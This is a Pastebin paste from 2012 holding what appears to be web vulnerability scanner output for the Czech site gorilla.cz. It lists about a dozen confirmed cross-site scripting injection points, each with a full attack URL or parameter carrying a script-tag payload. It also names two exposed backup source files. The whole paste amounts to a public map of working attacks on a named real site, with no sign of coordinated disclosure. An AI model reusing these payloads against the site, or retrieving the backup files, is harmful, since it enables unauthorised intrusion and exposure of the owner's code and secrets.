API tools faq
paste
Advertisement
sroub3k

gorilla.cz

sroub3k
Sep 28th, 2012
220
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.14 KB | None | 0 0
raw download clone embed print report
  1. XSS (Cross-site Scripting)
  2.  
  3. Severity: Important
  4. Confirmation: Confirmed
  5. URL: http://www.gorilla.cz/disc_tree.php?unid='"--></style></script><script>alert(0x0000BC)</script>
  6. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  7. Parameter Name: unid
  8. Parameter Type: Querystring
  9. Attack Pattern: '"--></style></script><script>alert(0x0000BC)</script>
  10.  
  11. Severity: Important
  12. Confirmation: Confirmed
  13. URL: http://www.gorilla.cz/disc_input.php
  14. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  15. Parameter Name: msg_id
  16. Parameter Type: Post
  17. Attack Pattern: '"--></style></script><script>alert(0x00027D)</script>
  18.  
  19. Severity: Important
  20. Confirmation: Confirmed
  21. URL: http://www.gorilla.cz/article/'"--></style></script><script>alert(0x000066)</script>
  22. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  23. Parameter Name: URI-BASED
  24. Parameter Type: RawUrlInjection
  25. Attack Pattern: '"--></style></script><script>alert(0x000066)</script>
  26.  
  27. Severity: Important
  28. Confirmation: Confirmed
  29. URL: http://www.gorilla.cz/article/878-gorilla-ma-rss.html'"--></style></script><script>alert(0x000067)</script>
  30. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  31. Parameter Name: URI-BASED
  32. Parameter Type: RawUrlInjection
  33. Attack Pattern: '"--></style></script><script>alert(0x000067)</script>
  34.  
  35. Severity: Important
  36. Confirmation: Confirmed
  37. URL: http://www.gorilla.cz/article/12348-trailer-paranormal-activity-4-je-to-tu-zase.html'"--></style></script><script>alert(0x0000AA)</script>
  38. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  39. Parameter Name: URI-BASED
  40. Parameter Type: RawUrlInjection
  41. Attack Pattern: '"--></style></script><script>alert(0x0000AA)</script>
  42.  
  43. Severity: Important
  44. Confirmation: Confirmed
  45. URL: http://www.gorilla.cz/article/12347-trailer-gambit-cameron-diaz-a-colin-firth-ve-filmu-brat-coen.html'"--></style></script><script>alert(0x0000AE)</script>
  46. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  47. Parameter Name: URI-BASED
  48. Parameter Type: RawUrlInjection
  49. Attack Pattern: '"--></style></script><script>alert(0x0000AE)</script>
  50.  
  51. Severity: Important
  52. Confirmation: Confirmed
  53. URL: http://www.gorilla.cz/article/12346-blb-a-blbjs-jak-se-bude-jmenovat-pokraovn-.html'"--></style></script><script>alert(0x0000F4)</script>
  54. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  55. Parameter Name: URI-BASED
  56. Parameter Type: RawUrlInjection
  57. Attack Pattern: '"--></style></script><script>alert(0x0000F4)</script>
  58.  
  59. Severity: Important
  60. Confirmation: Confirmed
  61. URL: http://www.gorilla.cz/article/12345-voice-us-3-6-dl-u-to-zan-nudit.html'"--></style></script><script>alert(0x0000F2)</script>
  62. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  63. Parameter Name: URI-BASED
  64. Parameter Type: RawUrlInjection
  65. Attack Pattern: '"--></style></script><script>alert(0x0000F2)</script>
  66.  
  67. Severity: Important
  68. Confirmation: Confirmed
  69. URL: http://www.gorilla.cz/article/12340-velk-test-novch-seril-20122013-partners.html'"--></style></script><script>alert(0x0000E6)</script>
  70. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  71. Parameter Name: URI-BASED
  72. Parameter Type: RawUrlInjection
  73. Attack Pattern: '"--></style></script><script>alert(0x0000E6)</script>
  74.  
  75. Severity: Important
  76. Confirmation: Confirmed
  77. URL: http://www.gorilla.cz/article/12341-recept-na-bohatstv-5-dl-koalka-a-prance.html'"--></style></script><script>alert(0x000100)</script>
  78. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  79. Parameter Name: URI-BASED
  80. Parameter Type: RawUrlInjection
  81. Attack Pattern: '"--></style></script><script>alert(0x000100)</script>
  82.  
  83. Severity: Important
  84. Confirmation: Confirmed
  85. URL: http://www.gorilla.cz/article/12338-lost-angels-i-andl-se-mohou-ztratit.html'"--></style></script><script>alert(0x000107)</script>
  86. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  87. Parameter Name: URI-BASED
  88. Parameter Type: RawUrlInjection
  89. Attack Pattern: '"--></style></script><script>alert(0x000107)</script>
  90.  
  91. Severity: Important
  92. Confirmation: Confirmed
  93. URL: http://www.gorilla.cz/article/12344-lore-dwayne-johnson-jako-lovec-netvor-v-reii-barryho-sonnenfelda.html'"--></style></script><script>alert(0x00010B)</script>
  94. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  95. Parameter Name: URI-BASED
  96. Parameter Type: RawUrlInjection
  97. Attack Pattern: '"--></style></script><script>alert(0x00010B)</script>
  98.  
  99. Severity: Important
  100. Confirmation: Confirmed
  101. URL: http://www.gorilla.cz/disc_input.php
  102. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  103. Parameter Name: unid
  104. Parameter Type: Post
  105. Attack Pattern: '"--></style></script><script>alert(0x0002F3)</script>
  106.  
  107. ||| Backup Source Code Found
  108.  
  109. Severity: Important
  110. Confirmation: Confirmed
  111. URL: http://www.gorilla.cz/index.php~
  112. Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
  113.  
  114. Severity: Important
  115. Confirmation: Confirmed
  116. URL: http://www.gorilla.cz/init.php~
  117. Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!